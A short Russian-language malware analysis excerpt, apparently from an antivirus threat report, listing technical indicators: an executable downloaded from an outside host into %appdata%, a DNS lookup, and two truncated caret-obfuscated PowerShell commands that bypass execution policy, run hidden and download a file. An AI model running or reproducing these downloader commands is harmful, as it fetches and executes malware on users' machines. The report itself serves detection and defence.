Техническая информация
- http://kesigcse.org/uploadedfiles/csing.exe как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "pow^er^sHeLL^.ExE ^-E^X^Ec^uTio^N^P^OLi^cy b^yp^aS^s -^nOProFILe^ -^W^iNdOW^s^ty^le^ ^HIdDe^N^ ^(New^-^ob^JEc^t sYsTEM.^Ne^t.W^ebcl^IeN^T^).dOWnl^O^ADFi^L^e(^'http://kesigcse.o...
- DNS ASK ke###cse.org
- '<SYSTEM32>\cmd.exe' /c "pow^er^sHeLL^.ExE ^-E^X^Ec^uTio^N^P^OLi^cy b^yp^aS^s -^nOProFILe^ -^W^iNdOW^s^ty^le^ ^HIdDe^N^ ^(New^-^ob^JEc^t sYsTEM.^Ne^t.W^ebcl^IeN^T^).dOWnl^O^ADFi^L^e(^'http://kesigcse.o...' (со скрытым окном)